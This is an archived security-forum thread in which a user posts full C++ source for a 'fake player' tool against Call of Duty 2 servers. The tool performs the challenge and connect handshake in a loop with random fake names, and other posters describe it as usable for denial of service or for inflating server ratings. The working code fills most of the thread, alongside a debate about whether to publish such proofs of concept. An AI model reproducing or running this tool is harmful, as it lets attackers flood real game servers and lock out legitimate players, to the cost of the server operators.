Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 11:53

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 12 posts ] 
Author Message
 Post subject: Trying to make a Fake Bug Player for COD2
PostPosted: 04 Aug 2010 18:51 

Joined: 25 Jun 2010 06:22
Posts: 14
Problem Solved.

I made de Fake Bug Player Finally.


Top
 Profile  
 
 
 Post subject: Re: Trying to make a Fake Bug Player for COD2
PostPosted: 06 Aug 2010 22:43 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
what is the point of this post ? if you dont feel like sharing, then go away. this forum is not for trolling to say that you have done it.

you should post, how did you do that and include the source code and compiled tool, like Luigi does. that would be much better than saying "problem solved" without any details.


Top
 Profile  
 
 Post subject: Re: Trying to make a Fake Bug Player for COD2
PostPosted: 07 Aug 2010 00:29 

Joined: 03 Aug 2010 02:28
Posts: 3
I agree with Sethioz.


Top
 Profile  
 
 Post subject: Re: Trying to make a Fake Bug Player for COD2
PostPosted: 11 Aug 2010 14:36 

Joined: 25 Jun 2010 06:22
Posts: 14
Sethioz wrote:
what is the point of this post ? if you dont feel like sharing, then go away. this forum is not for trolling to say that you have done it.

you should post, how did you do that and include the source code and compiled tool, like Luigi does. that would be much better than saying "problem solved" without any details.


Well, the thing is that this fake player bug can crash a server right?

If so, these days a lot of lamerz are using aluigi tools to block and rcons on cod2 servers....and i'm scared of giving source code here, so people will start crashing all servers. Thats all.


Top
 Profile  
 
 Post subject: Re: Trying to make a Fake Bug Player for COD2
PostPosted: 12 Aug 2010 23:33 

Joined: 16 Aug 2007 06:25
Posts: 367
DrTenma, you tell us: do the fake players crash the server? I doubt it, unless there is some major bug with the way CoD2 handles players. Fake players are going to be used to boost the servers rating up (on sites like game-monitor and gametracker), or be used as a denial of service to prevent legitimate players from connecting.

And yes, people do use publicly released code for malicious use. But security through obscurity is no security at all. If the fake players don't crash the server, then post your findings. If they do, maybe you should PM it to Luigi and he can look into a patch before releasing a PoC. Someone on these forums was actually going to let me use their cdkey to check into CoD2 fake players, but I never got a PM :\. Oh well


Top
 Profile  
 
 Post subject: Re: Trying to make a Fake Bug Player for COD2
PostPosted: 15 Aug 2010 02:08 

Joined: 25 Jun 2010 06:22
Posts: 14
Mmh i tought that i've read that somewhere....but if it doesn't crash a server, then here is my code (need to be cleaned...etc) :

Code:
#include <iostream>
#include <string.h>
#include <string>
#include <sstream>
#include <unistd.h>


#if defined (WIN32)
    #include <winsock2.h>
    typedef int socklen_t;
    #pragma comment(lib,"ws2_32.lib")
#elif defined (linux)
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #define INVALID_SOCKET -1
    #define SOCKET_ERROR -1
    #define closesocket(s) close(s)
    typedef int SOCKET;
    typedef struct sockaddr_in SOCKADDR_IN;
    typedef struct sockaddr SOCKADDR;
#endif



using namespace std;

static int initSocket(void);
static void endSocket(void);
int rbuffersize(0);
string buffer, buffer2, buffer3, rbufferstr, final;
char rbuffer[65000];
SOCKET sockmaster, sockserver;

string getFakeName();
int getRandomNumber(int a, int b);
int waitTimeOut(SOCKET &sock, unsigned int time);



int main()
{
    // Initialization Of Needed Variable
    int sentmaster(0), sentserver(0), tempsize(0), x(0);

    srand(time(NULL)); // Useful Random Function

    initSocket(); // Socket Initialization

    // Creating Both Sockets Needed
    sockmaster = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    sockserver = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

    // If Any Error During Creation Of Socket...
    if(sockmaster == INVALID_SOCKET || sockserver == INVALID_SOCKET)
    {
        cout << "Error : Creating Socket." << endl;
        endSocket();
        return 1;
    }

    // Buffer To Send To The Master Server And To The Server
    buffer = "????????getKeyAuthorize 0 XXXXXXXXXXXXXXXX"; // Replace XXXXXXXXXXXXXXXX by first 16 chars of your cd key
    buffer2 = "????????getchallenge";

    // Creation Of Both SOCKADDR_IN Structures Needed For Server And MasterServer
    sockaddr_in sin, sinserver;
    sin.sin_addr.s_addr = inet_addr("63.146.124.40");
    sin.sin_port = htons(20700);
    sin.sin_family = AF_INET;

    sinserver.sin_addr.s_addr = inet_addr(""); // put ip of the server
    sinserver.sin_port = htons(28960); // Change port if needed
    sinserver.sin_family = AF_INET;

    // Sending a Message To The Master Server In Order To Register The CD KEY
    if( (sentmaster = sendto(sockmaster, buffer.c_str(), buffer.size(),0, (SOCKADDR *)&sin, sizeof(sin) )) != buffer.size() )
    {
        cout << "Error : Connexion Impossible on " << inet_ntoa(sin.sin_addr) << ":"<< htons(sin.sin_port) << endl;
        endSocket();
        return 3;
    }


//##################################################################################
//##################################################################################
//##################################################################################
//##################################################################################


    tempsize = sizeof(sin);;
    for(x=0;x<10;x++)
    {
        // Cleaning Some Stuff
        sentserver = 0;
        rbufferstr.empty();
        rbuffersize = 0;
        memset(rbuffer, 0, sizeof(rbuffer));

        cout << "\n-----------------------Sending First Packet-----------------------" << endl;

        // Sending The First Packet To The Normal Server
        if( (sentserver = sendto(sockserver, buffer2.c_str(), buffer2.size(),0, (SOCKADDR *)&sinserver, sizeof(sinserver) )) != buffer2.size() )
        {
            cout << "Error : Connexion Impossible on " << inet_ntoa(sinserver.sin_addr) << ":"<< htons(sinserver.sin_port) << endl;
            endSocket();
            return 3;
        }

        // Time Out Function
        if(!waitTimeOut(sockserver, 3))
        {
            cout << "Error : Time out." << endl;
            endSocket();
            return 10;
        }

        // We Wait For The Response From Normal Server
        if( (rbuffersize = recvfrom(sockserver,rbuffer,65000, 0, NULL, NULL)) != SOCKET_ERROR)
        {
            cout <<"\nReceived Datas :" << rbuffer << endl;
            rbufferstr = rbuffer;
        }

        // Check IF Cd Key Is In Use
        if(rbufferstr.substr(10, 20)=="EXE_ERR_CDKEY_IN_USE")
        {
            cout << "\n/!\\ CD Key Is In Use, Try Another Key Or Try Later" << endl;
            endSocket();
            return 11;
        }

        cout << "\n-----------------------Sending Second Packet-----------------------" << endl;

        // Converting The Random Port To an INT
        std::ostringstream out;
        out << getRandomNumber(10000, 65000);

        // Creating Last Packet To Connect
        buffer3 = "????????connect \"\\cg_predictItems\\1\\cl_anonymous\\0\\cl_voice\\1\\rate\\25000\\snaps\\30\\name\\"+ getFakeName() +"\\protocol\\115\\challenge\\" + rbufferstr.substr(22, 10) + "\\qport\\"+ out.str() +"\"";
        //cout << endl << buffer3 << endl;

        // We Send That Connect Packet To The Normal Server
         if( (sentserver = sendto(sockserver, buffer3.c_str(), buffer3.size(),0, (SOCKADDR *)&sinserver, sizeof(sinserver) )) != buffer3.size() )
        {
            cout << "Error : Connexion Impossible on " << inet_ntoa(sinserver.sin_addr) << ":"<< htons(sinserver.sin_port) << endl;
            endSocket();
            return 3;
        }

        // Same As Above
        if(!waitTimeOut(sockserver, 3))
        {
            cout << "Error : Time out." << endl;
            endSocket();
            return 10;
        }

         // We Wait For The Response From Normal Server For Teh Second Packet
        if( ( rbuffersize = recvfrom(sockserver,rbuffer,65000, 0, NULL, NULL) ) != SOCKET_ERROR)
        {
            rbuffer[rbuffersize]=0;
            cout <<"\nReceived Datas :" << rbuffer << endl;

        }

    }

    if(WSAGetLastError() != 0)
    {
         cout <<WSAGetLastError() << endl;
    }


    endSocket();
    return 0;
}

static int initSocket(void)
{
    #if defined (WIN32)
        WSADATA WSAData;
        int err = WSAStartup(MAKEWORD(2,2), &WSAData);
    #else
        int err=  0;
    #endif
    if(err < 0)
    {
        cout << "Error : Initialization Socket." << endl;
        return 1;
    }

    return 0;
}

static void endSocket(void)
{
    closesocket(sockmaster);
    closesocket(sockserver);
    #if defined (WIN32)
       WSACleanup();
    #endif

}

int waitTimeOut(SOCKET &sock, unsigned int time)
{
    fd_set readSet;
    FD_ZERO(&readSet);
    FD_SET(sock, &readSet);
    struct timeval timeVal;
    timeVal.tv_sec = time;
    timeVal.tv_usec = 0;
    if(select(sock+1, &readSet, NULL, NULL, &timeVal) > 0)
    {
        return true;
    }
    return false;
}

string getFakeName()
{
        string noms[] = {"fly",
                       "??pium",
                       "[11]glyhigh'",
                       "55th|supah",
                       "pandemic prank`",
                       "esuba' Lucker",
                       "skill>l33t",
                       ":P'Owner:",
                       "BB|goliot",
                       "aG.L4stknight",
                       "revol<3",
                       "[vg]Frst",
                       "[11]glyhigh'",
                       "cr33p inct'v",
                       "=TFF=MinuteMan",
                       "shox",
                       "Bodyguard#",
                       "phnyyyyyyyyyyyy",
                       "Local",
                       "(LZ) Tr3n",
                       "eZ0o_",
                       "Interc3pt0r",
                       "[K9] EnV0ltA",
                       "LoL.mp",
                       "eMuda.Mandar1ni",
                       "Jo!Ntzz",
                       "Death Magnet1c",
                       "St1flersMum",
                       "Virtue.Drush",
                       "Kqp",
                       "<-Low",
                       "h4ns",
                       "Pown-D.D&B",
                       "Kr0ketje1.",
                       "scrappycoco",
                       "-=SnF=-STIN",
                       "Accce",
                       "element0",
                       "|IF|Kebe",
                       "|IF|SadiC",
                       "#MHB::Sho0ter",
                       "#MHB::Urwan",
                       "(-GPS-)Own3d",
                       "[C.SF.]boreas",
                       "SOLO",
                       "Berta incazz0so",
                       "cabutssss",
                       "daro",
                       "[SdF] GhOsT!",
                       "MA3EH_HEPE",
                       "Moron",
                       "McLovin",
                       "=OSM=Amantis",
                       "BrotherS|KAM!L3",
                       "*R!P* ^6ZDRAWEX",
                       "^6???",
                       "WdC^4|^7.Vig",
                       "^5z^30^9h4n",
                       "mordshase",
                       "m0u",
                       "Wac Emigration",
                       "^6BrotherS^7|^3NuK3",
                       "^9Doggy^7Fashion",
                       "[^3SWL^7]MadToni",
                       "[KUR!] ^1W^7alkuere ^1!",
                       "Lisa ^5:)",
                       "^4]^7PBC^4[^7 Pvt.Paula",
                       "[k^90^7|^9L^7eckSieKon]",
                       "^^00[DFF]D4rk",
                       "WdC|^8.Myros",
                       "Alam^5...",
                       "<cH0p^3-Ch0P>",
                       "FG' SoNNy",
                       "Lucker.Pro <3",
                       "Where",
                       "=TCFF=MinuteMan",
                       "GL^1-^7M^14^7FIA",
                       "ubojica",
                       "thoMPson",
                       "NAPUSENA KAMILA",
                       "|AFK|bidzy",
                       "d2T.TurboHIGH",
                       "{silk}AxE",
                       "Ruzno pace",
                       "exor",
                       "[1oolac] haTa*",
                       "b4rr4",
                       "=^9TCFF^7=^"};
    string nomFinal = noms[getRandomNumber(0,86)];
    return(nomFinal);


}

int getRandomNumber(int a, int b)
{

    int nombre = a + (int)((double)rand() / ((double)RAND_MAX + 1) * b);
    return nombre;
}




Top
 Profile  
 
 Post subject: Re: Trying to make a Fake Bug Player for COD2
PostPosted: 15 Aug 2010 12:57 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
Luigi releases ALL PoCs, not only ones that are "safe" to use. It is lame if you just say "i did it" and thats it. who cares if lamerz crash or not, if they start crashing servers, then it means that game company need to patch it.


Top
 Profile  
 
 Post subject: Re: Trying to make a Fake Bug Player for COD2
PostPosted: 16 Aug 2010 04:28 

Joined: 25 Jun 2010 06:22
Posts: 14
And do you really believe that IW will care about a game that is old for +5years ? You probably don't care because you don't play this game, but believe me, when you run some servers on this game and some kids start crashing your server for "fun"....they really piss you off, especially when you can't do anything.


Top
 Profile  
 
 Post subject: Re: Trying to make a Fake Bug Player for COD2
PostPosted: 18 Aug 2010 03:07 

Joined: 16 Aug 2007 06:25
Posts: 367
But the fake players do not crash a server. And if the protocol is similar to CoD4, they are very obvious and easy to ban. Though if there is a game with a bug that allows crashing the server, hiding what you know isn't going to help. Eventually people will find out about it. It's best to release what you know (even if it's to just someone like Luigi), and ask for a fix. A 3rd party fix is better than nothing, but not sharing the knowledge won't get you diddly squat. And you'd be surprised, some game companies would still release a patch for their older games.


Top
 Profile  
 
 Post subject: Re: Trying to make a Fake Bug Player for COD2
PostPosted: 06 Sep 2010 08:38 

Joined: 16 Aug 2007 06:25
Posts: 367
No, they do not crash the server - fake-players-dos-call-of-duty-2-t1517.html


Top
 Profile  
 
 Post subject: Re: Trying to make a Fake Bug Player for COD2
PostPosted: 08 Sep 2010 10:08 

Joined: 24 Jun 2010 10:04
Posts: 70
Location: aluigi not @ home
uhmmm wasn't more simple to use q3fill setting the needed parameters needed to work with cod2 and/or setting the cod2 auth server?
I have not tested it, I'm only asking as curiosity to know if it works using the default q3fill :)


Top
 Profile  
 
 Post subject: Re: Trying to make a Fake Bug Player for COD2
PostPosted: 09 Sep 2010 00:27 

Joined: 16 Aug 2007 06:25
Posts: 367
I remember CoD4 didn't work well with q3fill (dont remember the reason). CoD2 seems almost identical, so I dunno. It might work


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 12 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: